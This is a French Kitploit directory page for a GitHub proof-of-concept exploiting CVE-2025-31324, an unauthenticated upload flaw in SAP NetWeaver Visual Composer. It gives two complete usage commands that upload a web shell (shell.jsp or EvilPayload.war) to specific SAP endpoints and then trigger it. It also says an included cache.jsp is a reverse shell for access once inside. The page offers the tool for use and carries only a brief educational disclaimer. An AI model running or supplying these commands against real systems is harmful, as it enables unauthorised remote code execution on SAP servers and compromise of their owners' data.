Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-31324_PoC_SAP — Preuve de concept pour CVE-2025-31324 : téléversement non authentifié dans SAP NetWeaver Visual Composer Metadata Uploader | Kitploit
Outils/GitHubGitHub/abrewer251/cve-2025-31324_poc_sap
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubabrewer251/cve-2025-31324_poc_sap

CVE-2025-31324_PoC_SAP

Preuve de concept pour CVE-2025-31324 : téléversement non authentifié dans SAP NetWeaver Visual Composer Metadata Uploader

Voir le dépôt
131il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-31324_PoC

Preuve de concept pour CVE-2025-31324 : Téléversement non authentifié dans SAP NetWeaver Visual Composer Metadata Uploader

Ce script effectue :

  1. Téléversement de fichier vers le point de terminaison vulnérable (via l'hôte/le port d'upload)
  2. Déclenchement facultatif via HTTP GET (via l'hôte/le port de déclenchement)
  3. Validation/journalisation de base des réponses

Exemple d'utilisation : python3 PoC.py
--host sap.example.com --port 50000
--endpoint /irj/portal/sap/bc/webdynpro/sap/ZWDC_METADATA_UPLDR
--file EvilPayload.war
--trigger-path /irj/portal/irj/servlet_jsp/irj/root/EvilPayload/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https true
--bypass-portal

python3 PoC.py --host sap.example.com --port 50000
--endpoint /developmentserver/metadatauploader
--file shell.jsp
--trigger-path /visual_composer/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https

Vous avez également la possibilité de téléverser un fichier .war si c'est ainsi que vous souhaitez procéder. cache.jsp est un reverse shell qui vous donnera accès une fois à l'intérieur du système. (Je travaille encore sur certains points)

Avertissement

Ce contenu est destiné uniquement à des fins éducatives et ne doit pas être utilisé pour des activités malveillantes. Assurez-vous toujours d'avoir les autorisations nécessaires et de suivre les directives éthiques lors des tests ou des recherches sur les vulnérabilités de sécurité.

Pour toute question ou clarification, n'hésitez pas à nous contacter. Restez en sécurité et protégé !

Télécharger l’outil